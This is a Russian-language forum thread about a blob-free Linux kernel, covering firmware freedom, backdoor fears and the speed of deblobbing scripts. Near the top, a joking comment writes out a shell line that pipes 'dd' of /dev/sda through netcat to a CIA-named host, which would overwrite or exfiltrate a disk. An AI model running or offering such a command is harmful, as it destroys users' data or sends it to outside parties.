|
2.3, pavlinux (ok), 00:21, 02/03/2010 [^] [^^] [^^^] [ответить]
| +3 +/– |
int fw[8][8] = {
{0x167,0x163,0x308,0x193,0x333,0x247,0x347,0x263},
{0x160,0x150,0x195,0x140,0x132,0x299,0x258,0x327},
{0x179,0x277,0x324,0x276,0x204,0x351,0x231,0x351},
{0x180,0x327,0x266,0x125,0x290,0x345,0x200,0x230},
{0x281,0x282,0x196,0x133,0x175,0x190,0x297,0x109},
{0x113,0x138,0x277,0x146,0x211,0x181,0x246,0x291},
{0x231,0x216,0x340,0x209,0x340,0x344,0x206,0x294},
{0x318,0x245,0x192,0x126,0x108,0x293,0x257,0x291}
}
Знаешь что это за код? Я тоже .... :)
Хотя не... тут закодировано следующие
if [ count > savecount] then dd of=/dev/sda bs=1024k count=1024 offset=date | netcat http://cia.com/incoming/inc.cgi 16666; savecount++; fi;
Вот так, при каждом включении питания весь диск, по мегабайту, перекачается в ЦРУ.
| |
|
|
4.15, pavlinux (ok), 01:33, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>if [ count > savecount] then dd of=/dev/sda bs=1024k count=1024 offset=date | netcat http://cia.com/incoming/inc.cgi 16666; savecount++; fi;
>
>Вы хотели сказать if=/dev/sda ?)
of тоже весело .... по команде из центра ... Ж=)
| |
|
3.28, Аноним (-), 10:37, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Нет реально, как выглядит код прошивок. Если там микроконтроллеры, нужен специальный компилятор си или ассемблера. Если ПЛИС, ещё что-то типа VHDL
| |
|
4.32, тоже user (?), 11:08, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Они потому и бинарные, что уже откомпилированные и содержатся в коде в виде массивов с бинарными данными-кодом.
| |
4.45, pavlinux (ok), 13:55, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Нет реально, как выглядит код прошивок. Если там микроконтроллеры, нужен специальный компилятор
>си или ассемблера. Если ПЛИС, ещё что-то типа VHDL
Как! Вы ещё не видели в коде ядра ассмеблер для чипов Adaptec 7901/7902
# less drivers/scsi/aic7xxx/aicasm/aicadm.c
/* Aic7xxx SCSI host adapter firmware asssembler */
...
| |
|
3.53, User294 (ok), 14:56, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Хотя не... тут закодировано следующие
>if [ count > savecount] then dd of=/dev/sda bs=1024k count=1024 offset=date | netcat
>http://cia.com/incoming/inc.cgi 16666; savecount++; fi;
1) В вашей строке явно больше чем 64 байта... ;P
2) Ваша строка попахивает каким-то странным саботажем с -of= :)
>Вот так, при каждом включении питания весь диск, по мегабайту, перекачается в ЦРУ.
Скорее, так можно чего-нить колоритно [beep]нуть на вашем диске и сообщить о данном досадном факте ЦРУ :)
| |
|
4.66, DiamondX7 (?), 15:00, 03/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
cia.com (com-commercial) - даже прикольно :)
позволю себе поправить cia.gov - government
http://tools.ietf.org/html/rfc920
а еще есть: whitehouse.gov, nasa.gov(клевый сайт), af.mil(тож клевый), navy.mil etc. их там как собак нерезанных, и прям кажный алчет када сбросят 1024 какой-нидь дряни ;)
| |
|
|
|
1.2, mitya (ok), 00:19, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| –14 +/– |
Что за маниакальная страстишка к свободе? Как-будто завтра все производители драйверов разом поработят всех линуксоидов и отправят их на урановые рудники.
| |
|
2.7, Аноним (-), 00:45, 02/03/2010 [^] [^^] [^^^] [ответить]
| +9 +/– |
Эти люди (выпускающие свободное ядро) тебе чем-то мешают?
| |
2.10, Аноним (-), 01:13, 02/03/2010 [^] [^^] [^^^] [ответить]
| +7 +/– |
> Что за маниакальная страстишка к свободе? Как-будто завтра все производители драйверов разом поработят всех линуксоидов и отправят их на урановые рудники.
А Вы уже купили своему ребёнку право читать?
| |
|
3.16, pavlinux (ok), 01:36, 02/03/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
>> Что за маниакальная страстишка к свободе? Как-будто завтра все производители драйверов разом поработят всех линуксоидов и отправят их на урановые рудники.
>
>А Вы уже купили своему ребёнку право читать?
Можно подумать вы читаемые ребенком книги сами пишете... :)
Так что, косвенно это происходит со времен Александрийской и подобных древних библиотек.
| |
|
4.52, vayerx (ok), 14:39, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
не накаркать бы, но интернет и право читать - все ж таки разные вещи
| |
4.55, User294 (ok), 15:05, 02/03/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
>Да. За 650 рублей в месяц мне доступен интернет.
Не надо подменять понятия - интернет всего лишь возможость передавать данные.
| |
|
|
2.27, аноним (?), 10:11, 02/03/2010 [^] [^^] [^^^] [ответить]
| +5 +/– |
> Что за маниакальная страстишка к свободе?
Жесть. Что за тяга к рабству и зависимости от воли других людей?
| |
|
3.40, dRiZd (?), 13:01, 02/03/2010 [^] [^^] [^^^] [ответить]
| –4 +/– |
Вы сами поняли чего написали?
По Вашим словам: надо существовать вне общества, со всеми вытекающими...
| |
|
2.54, User294 (ok), 15:03, 02/03/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>Что за маниакальная страстишка к свободе?
Да, рабы не любят тех кто тянется к свободе, утешают себя что свобода не так уж и нужна, etc и ругатся на тех кто свободен. Шаблонно. А что до производителей - вы уж извините, но мы помним AWARD_SW и еще два вагона прочих инженерных паролей^W бэкдоров. Поэтому блобам доверия нет. И не то чтобы без причины - прецеденты были, этого достаточно.
ИМХО, свободы много не бывает и если кто-то хочет получить больше свободы и меньше потенциального западлостроения, даже если что-то и не заработает - затея имеет право на жизнь.
| |
|
1.4, 123456 (??), 00:22, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| –5 +/– |
подумал сначала, что "полностью свободный вариант Linux ядра" - это по какой-то полностью свободной лицензии вместо GPL
| |
|
2.6, Thorton (?), 00:37, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Времена нынче не те - ядро кишит блобами.. проплачеными блобами...
| |
|
3.56, User294 (ok), 15:07, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Времена нынче не те - ядро кишит блобами.. проплачеными блобами...
Дык это... есть железки в которые фирмваре грузится на лету. И или вы в них грузите фирмваре или они не работают, т.к. внутри оных нет кода для их собственного процессора.
| |
|
|
1.8, pavlinux (ok), 00:57, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Вот вам и свободный nvidia драйвер
DRM_NOUVEAU - Nouveau (nVidia) cards
drivers/gpu/drm/nouveau/nouveau_grctx.c: disabled non-Free firmware-loading machinery
drivers/gpu/drm/nouveau/nouveau_grctx.c: removed blobs
drivers/gpu/drm/nouveau/nv50_graph.c: removed blobs
| |
1.17, RapteR (ok), 05:22, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
>sed-вариант выполняется 3 минуты, awk - 5 минут, а Python и Perl - 90 минут.
Еще раз убедился в не прописной истине по поводу питона... Жаль, что находятся господа, которые додумываются использовать его там, где время выполнения задачи критично...
| |
|
2.18, амоним (?), 07:21, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
а что предлагаете использовать вместо него там, где время выполнения задачи критично?..
| |
|
3.20, RapteR (ok), 08:01, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>а что предлагаете использовать вместо него там, где время выполнения задачи критично?..
>
С или С++ если код достаточно сложный. + Вставки кода на ассемблере - очень эффективно работает.
| |
|
4.31, Аноним (-), 11:05, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Таких программистов на планете Земля может быть всего несколько сотен: тех кто хорошо программирует на си и умеет оптимизировать критические участки на ассемблере.
| |
|
5.37, RapteR (ok), 11:43, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Таких программистов на планете Земля может быть всего несколько сотен: тех кто
>хорошо программирует на си и умеет оптимизировать критические участки на ассемблере.
А кто тогда ядро по вашему пишет? Я думаю таких людей на самом деле очень много, просто они это не практикуют.
| |
|
6.48, pavlinux (ok), 14:12, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>Таких программистов на планете Земля может быть всего несколько сотен: тех кто
>>хорошо программирует на си и умеет оптимизировать критические участки на ассемблере.
>
>А кто тогда ядро по вашему пишет? Я думаю таких людей на
>самом деле очень много, просто они это не практикуют.
Конечно, душат попытки в зародыше... Со словами: "Оптимизируем движение вакуума!", "Загораем под луной"...
| |
|
|
|
|
2.21, prof_alex (?), 08:54, 02/03/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
> Еще раз убедился в не прописной истине по поводу питона...
А про перл мыслей никаких не возникло?
| |
|
3.22, RapteR (ok), 09:03, 02/03/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>А про перл мыслей никаких не возникло?
Он древний - ему простительно. Тем более с питоном такая ситуация, что народ пытается его использовать там где надо и где не надо - с перлом такого не было.
| |
|
|
5.50, RapteR (ok), 14:18, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Да ладно, у Перл первая задача - парсинг текста.
Да пофигу какая там у него задача - результат на лицо - sed проехался быстрее perl'a.
| |
|
6.57, pavlinux (ok), 15:09, 02/03/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>>Да ладно, у Перл первая задача - парсинг текста.
>
>Да пофигу какая там у него задача - результат на лицо -
>sed проехался быстрее perl'a.
sed и ed появились по-моему раньше чем UNIX... там уж точно оптимизация вековая.
| |
|
|
|
|
2.26, Антон (??), 10:01, 02/03/2010 [^] [^^] [^^^] [ответить]
| +3 +/– |
А вы видели вообще тот скрипт ???? Видимо это достижение FSF, посмотрите не пожалейте.
Объясняю почему у них так тормозит Python и Perl: сам скрипт у них на shell, из него для каждого файла вызывается фильтр, которых regexp-ом вырезает из этого файла нужные куски.
Этот скрипт для каждого файла с блобами вызывает каждый раз новую копию perl, python, awk или sed. 99.99% из того времени - это время на тысячи повторных запусков интерпретатора. Понятно, что python и perl значительно дольше запускаются, чем sed.
| |
|
3.42, Veter (??), 13:02, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
> Понятно, что python и perl значительно дольше запускаются, чем sed.
Ты проверь сначала, прежде чем утверждать. perl почти не уcтупает dash по скорости запуска, а "значительно дольше" - применимо только к питону.
| |
|
4.43, Антон (??), 13:37, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>> Понятно, что python и perl значительно дольше запускаются, чем sed.
>
>Ты проверь сначала, прежде чем утверждать. perl почти не уcтупает dash по
>скорости запуска, а "значительно дольше" - применимо только к питону.
Проверил, sed c одним regex выполняется за 0m0.004s, perl - 0m0.009s, python - 0m0.144s.
| |
|
3.46, амонинус (?), 14:04, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Там проблема еще в том, что у них поиск блобов выполняется при помощи каких-то жутких регулярных выражений, которые (как у них самих в комментарии к скрипту написано) Perl и Питон не тянут. Там скрипт на Перле сам выглядит большей частью как проприетарный блоб.
Вот пример ОДНОГО регекспа из этого скрипта:
blob '\([/][*][*]\+[/][\n]*\)*\([/][*][^*]*\([*]\+[^/*][^*]*\)*[*]*Micro[ ]code[^*]*\([*]\+[^/*][^*]*\)*[*]*8086:[^*]*\([*]\+[^/*][^*]*\)*[*]\+[/]\([\n]*[/][*][^*]*\([*]\+[^/*][^*]*\)*[*]\+[/]\)*\|#define[ ][ ]*D10\(1M\(_B\)\?\|1S\|2_E\)_\(CPUSAVER_\(TIMER\|BUNDLE\|MIN_SIZE\)_DWORD\|RCVBUNDLE_UCODE\)[ ][^\n]*\([\\][\n][^\n]*\)*\)\([\n]*[/][*][^*]*\([*]\+\([^/*]\|[/][\n]*[/][*]\+\)[^*]*\)*[*]*Micro[ ]code[^*]*\([*]\+[^/*][^*]*\)*[*]*8086:[^*]*\([*]\+[^/*][^*]*\)*[*]\+[/]\([\n]*[/][*][^*]*\([*]\+[^/*][^*]*\)*[*]\+[/]\)*\|[\n][\n]*#define[ ][ ]*D10\(1M\(_B\)\?\|1S\|2_E\)_\(CPUSAVER_\(TIMER\|BUNDLE\|MIN_SIZE\)_DWORD\|RCVBUNDLE_UCODE\)[ ]\(\\[\n]\|[^\n]\)*\)*' drivers/net/e100.c
| |
|
|
|
2.24, RapteR (ok), 09:59, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>один раз пройтись по исходникам - это не критично
А почему один раз? Можно допустим гит срез делать каждый день\час и выкладывать "кашерный" кернел, что бы люди качали и радовались.
| |
|
|
4.38, RapteR (ok), 11:47, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>осильте git merge
Сударь исключает, что при очередном мердже не притянется новый код с бинарями? Не руками же потом его дорезать...
| |
|
5.68, ig0r (??), 15:30, 11/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
ну по патчам скрипт должен быстрее пройтись, чем по всему коду, хотя если вы хотите делать ежедневную сборку, и каждый день лопатить полность ядро то это Ваш выбор, я Вас не буду отговаривать, но мне эта идея кажется глупой.
| |
|
|
|
|
1.25, Zenitur (?), 09:59, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Спасибо за отличную статью! Она проясняет всю тему без дополнительной литературы.
| |
1.29, Аноним (-), 10:40, 02/03/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Почему не сделать опцию ядра CONFIG_ISPOLZOVAT_BINARNIE_BLOBY? И зависимости от неё всех дров, использующих бинарные прошивки
| |
|
2.30, Антон (??), 10:49, 02/03/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
>Почему не сделать опцию ядра CONFIG_ISPOLZOVAT_BINARNIE_BLOBY? И зависимости от неё всех дров,
>использующих бинарные прошивки
Ничего страшного в этих блобах нет, если производитель разрешает их свободное использование. Никто же не возмущается, что в видеокарте, raid-контроллере, модеме и сетевухе блобы используются. IMHO, никакой разницы загружен блоб изначально в ROM или грузится в процессе загрузки ядра.
| |
|
|
2.39, Аноним (-), 12:53, 02/03/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
Ну да, так говорят продавцы про виндоус, когда не хотят отдавать деньги. Типа оно часть железа
| |
|
3.47, амонинус (?), 14:08, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Ну да, так говорят продавцы про виндоус, когда не хотят отдавать деньги.
>Типа оно часть железа
Ну, тут разные мнения существуют. Но мнение самого Столлмана (если проприетарное ПО в памяти самой железки, это нормально, а если закачивается при загрузке, то это недопустимо) ИМХО нелогично.
| |
|
4.51, pavlinux (ok), 14:26, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>Ну да, так говорят продавцы про виндоус, когда не хотят отдавать деньги.
>>Типа оно часть железа
>
>Ну, тут разные мнения существуют. Но мнение самого Столлмана (если проприетарное ПО
>в памяти самой железки, это нормально, а если закачивается при загрузке,
>то это недопустимо) ИМХО нелогично.
Да не, логично... ПО в железке - не ПО.
Firmware - это снаряд, надо его правильно расположить, найти молоток и правильно еб..ть по капсуле,
и не факт, что при этом вас не разорвет на сотню маленьких юзеров.
А ПО - это граната, - дергай и кидай подальше.
Представьте размер железяки, если те же функции будут собраны на железной логике.
И вмсето перепрошивки новой фирмвари, вам надо будет докупать дочернюю плату.
Ещё надо заставить производетелей видюх впаявать разёмы для RAM, а то ишь пристрастились,
видюшка с 1 Gb стоит 4000 руб, а с 2Gb уже 15000, хотя 1 гиг DDR 3 стоит 40$
| |
|
5.60, User294 (ok), 18:01, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
Там обычно разница не только в числе чипов но и зачастую в ширине шины и поюзанном чипаке, у которого куда больше блоков процессинга всего и вся. И, кстати, что это за видяха за 15 000 где юзается ... DDR3?! oO
| |
|
6.61, pavlinux (ok), 18:27, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Там обычно разница не только в числе чипов но и зачастую в
>ширине шины и поюзанном чипаке,
Толщина шины рулится контроллером памяти
> у которого куда больше блоков процессинга
>всего и вся. И, кстати, что это за видяха за 15
>000 где юзается ... DDR3?! oO
Дык, любой 285 и выше гфорс
| |
|
|
|
3.63, anonymous vulgaris (?), 21:42, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Ну да, так говорят продавцы про виндоус, когда не хотят отдавать деньги.
>Типа оно часть железа
http://www.opennet.me/opennews/art.shtml?num=25640
Компания Nokia объявила в введении в строй инициативы "Qt Board Verification Program" в рамках которой производителям портативных устройств и встраиваемых платформ предлагается проверить их оборудование на предмет полной совместимости с инструментарием Qt.
| |
|
2.59, User294 (ok), 17:57, 02/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>firmware is a part of hardware,
А есть и иная точка зрения. "Firmware is a software in silicon".
Ну а раз software - вот извините, но оно обладает всеми свойствами. А "load of BS" - это бэкдоры и "инженерные входы" по типу AWARD_SW :P.
| |
|
3.67, birdie (?), 11:27, 04/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
backdoors may exist on a hardware level, so your post makes no sense :)
have you ever heard of keyboards with embedded keyloggers?
have you ever heard of laptops which silently redirect some of your network traffic to an interested party?
There's no need for software to spy on us.
| |
|
|
|
|
3.69, Дым (?), 12:28, 14/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>Простите но зачем мне такое ядро, если я с ним не смогу работать?
>
>Кто же виноват, в том что Вы не можете?! :)
>Сутки uptime и ничё работает, там поскипали дрова от железа экзотического...
А кто виноват, что никто-ничего-не-хочет-объяснять ?
OpenSource может быть и в софтах, но насчет распространения опыта работы с линуксом - полный и жесточаишй - copyright :(
| |
|
4.70, pavlinux (ok), 19:24, 14/03/2010 [^] [^^] [^^^] [ответить]
| +/– |
>А кто виноват, что никто-ничего-не-хочет-объяснять ?
>OpenSource может быть и в софтах, но насчет распространения опыта работы с
>линуксом - полный и жесточаишй - copyright :(
Накой хрен Вам опыт других, если он завтра уже не понадобится.
Для начала K&R (или Финогенова), Робачевский и какая нибудь мутатень про Linux для Чайников.
Потом по специализации:
Немет, TCP/IP Internals, Cisco Press (протоколы) - для админов.
Advanced Linux Proggraming - для кодеров + все выше перечисленное
Linux system programming - для системщиков + все выше перечисленное
Р.Лав + Бовет & Чезати + Смолски - для ядерщиков + все выше перечисленное
А дальше, чем больше книжек с животными на обложке, тем круче.
По Perl / MySQL / ProgreSQL / Regexp / Emacs
| |
|
|
|
|